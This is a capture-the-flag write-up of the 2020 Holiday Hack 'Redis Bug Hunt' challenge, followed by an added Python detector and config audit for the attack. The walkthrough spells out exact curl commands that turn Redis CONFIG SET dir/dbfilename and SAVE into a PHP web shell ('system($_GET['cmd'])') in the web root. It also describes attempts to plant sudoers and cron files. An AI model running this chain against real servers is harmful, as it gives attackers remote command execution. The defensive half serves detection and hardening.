Redis Bug Hunt: SHHC20
Redis Bug Hunt

In the Kitchen beside Holly Evergreen is a terminal titled Redis Bug Hunt.

In talking with Holly, she mentions doing remote code execution against the host.


Googling around for various ways to abuse Redis, the main thing I found was to use the "save database" functionality to write a new file to the file system.

The db save is in Redis (RDB) format, so it has some binary characters at the beginning and end. The best bet will be to encode some CRLF before/after whatever I want and look for a forgiving interpretation of the file.

The system doesn't have an ssh client installed, so I can't drop an ssh key to log in as root.

When I drop a file into /etc/sudoers.d, sudoers complains about the format due to the binary at the top.

I try dropping cron jobs into various locations without much luck. It doesn't look like cron is running (likely standard in a container?).


Well... For this challenge, I don't need to get root (though it would be neat). I just need to look at the index page. So let's try dumping a PHP file.

URL encode the following string: "\n\n\n<?php system($_GET['cmd']); ?>\n\n"

After a couple of tries to get the syntax just right, I dropped a new PHP file that takes an argument and executes it as a raw command. I then used this to cat the index file.

Clear the existing Redis values with the command curl http://localhost/maintenance.php?cmd=flushall

Set the encoded value with curl http://localhost/maintenance.php?cmd=set,command,%22%0D%0A%0D%0A%0D%0A%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E%0D%0A%0D%0A%22%0D%0A

Save to the apache working directory with curl http://localhost/maintenance.php?cmd=config,set,dir,/var/www/html/, then curl http://localhost/maintenance.php?cmd=config,set,dbfilename,jeremy.php, and finally curl http://localhost/maintenance.php?cmd=save

Send a command to the new page with curl --output - http://localhost/jeremy.php?cmd=cat+index.php
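The sequence above (flushall, config set dir, config set dbfilename, save) is exactly what a defender should be looking for, because a legitimate backup never needs to point dir at a web root or give the dump a .php name. The script below is an added example written for this write-up, not code from the challenge or from Redis: it scans lines in the format redis-cli MONITOR prints and flags a client that changes dir or dbfilename and then saves, and it audits a redis.conf text for the settings that would have blocked the chain (protected-mode, bind, requirepass, and renaming CONFIG). The MONITOR lines, the two config texts, and the client addresses are all constructed for the example.

```python
"""Detect and prevent the Redis dir/dbfilename/SAVE file-write chain.

Added example, not part of the original write-up or of Redis itself.
  1. find_file_write_chains(): scans `redis-cli MONITOR` style lines and
     flags a client that sets dir/dbfilename and then SAVE/BGSAVEs.
  2. audit_redis_conf(): lists hardening gaps in a redis.conf text.
All sample data below is constructed for the example.
"""
import re
from collections import defaultdict

# redis-cli MONITOR line: <unix-ts> [<db> <client-addr>] "CMD" "arg" ...
MONITOR_RE = re.compile(r'^(?P<ts>[\d.]+) \[(?P<db>\d+) (?P<addr>\S+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Directories where a dumped RDB becomes executable code or persistence,
# and suffixes a web server or shell would interpret (assumed list).
SENSITIVE_DIR_PREFIXES = ("/var/www", "/etc/cron", "/etc/sudoers.d", "/root/.ssh")
SCRIPT_SUFFIXES = (".php", ".sh", ".py")


def parse_monitor_line(line):
    """Return (client_addr, COMMAND, [args]) or None for a non-matching line."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group("rest"))
    if not args:
        return None
    return m.group("addr"), args[0].upper(), args[1:]


def find_file_write_chains(lines):
    """Flag clients that change dir or dbfilename and then SAVE/BGSAVE.

    State is kept per client address; a plain SAVE with unchanged paths
    (a normal backup) is not reported.
    """
    state = defaultdict(dict)
    alerts = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        addr, cmd, args = parsed
        s = state[addr]
        if cmd == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET":
            if args[1].lower() in ("dir", "dbfilename"):
                s[args[1].lower()] = args[2]
        elif cmd == "FLUSHALL":
            s["flushall"] = True   # clearing keys first keeps the dump small
        elif cmd in ("SAVE", "BGSAVE"):
            d, f = s.get("dir"), s.get("dbfilename")
            if d is None and f is None:
                continue
            risky = (d is not None and d.startswith(SENSITIVE_DIR_PREFIXES)) or \
                    (f is not None and f.endswith(SCRIPT_SUFFIXES))
            alerts.append({"addr": addr, "dir": d, "dbfilename": f,
                           "flushall": s.get("flushall", False),
                           "severity": "high" if risky else "medium"})
            state[addr] = {}       # reset so a repeated chain is reported again
    return alerts


def audit_redis_conf(conf_text):
    """Return the hardening gaps in a redis.conf that this chain relies on."""
    settings, renamed = {}, set()
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "rename-command" and value:
            renamed.add(value.split()[0].upper())   # original command name
        else:
            settings[key] = value
    gaps = []
    if settings.get("protected-mode", "yes").lower() != "yes":
        gaps.append("protected-mode is off")
    if "bind" not in settings or "0.0.0.0" in settings["bind"]:
        gaps.append("bind is unset or 0.0.0.0: reachable from other hosts")
    if not settings.get("requirepass"):
        gaps.append("no requirepass: any client can run CONFIG SET")
    if "CONFIG" not in renamed:
        gaps.append("CONFIG not renamed: dir/dbfilename changeable at runtime")
    if settings.get("dir", "").startswith(SENSITIVE_DIR_PREFIXES):
        gaps.append("dir points at a web root or other sensitive path")
    return gaps


# Constructed MONITOR lines mirroring the write-up's sequence, plus a
# benign BGSAVE from another client that must not be flagged.
SAMPLE_MONITOR = '''
1608400000.100000 [0 172.17.0.3:52110] "FLUSHALL"
1608400001.100000 [0 172.17.0.3:52110] "SET" "command" "<constructed payload>"
1608400002.100000 [0 172.17.0.3:52110] "CONFIG" "SET" "dir" "/var/www/html/"
1608400003.100000 [0 172.17.0.3:52110] "CONFIG" "SET" "dbfilename" "jeremy.php"
1608400004.100000 [0 172.17.0.3:52110] "SAVE"
1608400005.100000 [0 10.0.0.5:41000] "BGSAVE"
'''.strip().splitlines()

WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\ndir /var/www/html\n"
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
requirepass REPLACE_WITH_LONG_RANDOM_SECRET   # placeholder, not a real secret
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for alert in find_file_write_chains(SAMPLE_MONITOR):
        print("ALERT", alert)
    print("weak conf gaps:", audit_redis_conf(WEAK_CONF))
    print("hardened conf gaps:", audit_redis_conf(HARDENED_CONF))
```

Run it against a live capture with redis-cli MONITOR piped into a file. The hardened config assumes the pre-ACL rename-command mechanism; on Redis 6 and later an ACL rule that denies CONFIG to application users does the same job, and in either case the web application should connect as a user that cannot issue CONFIG or SAVE at all.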
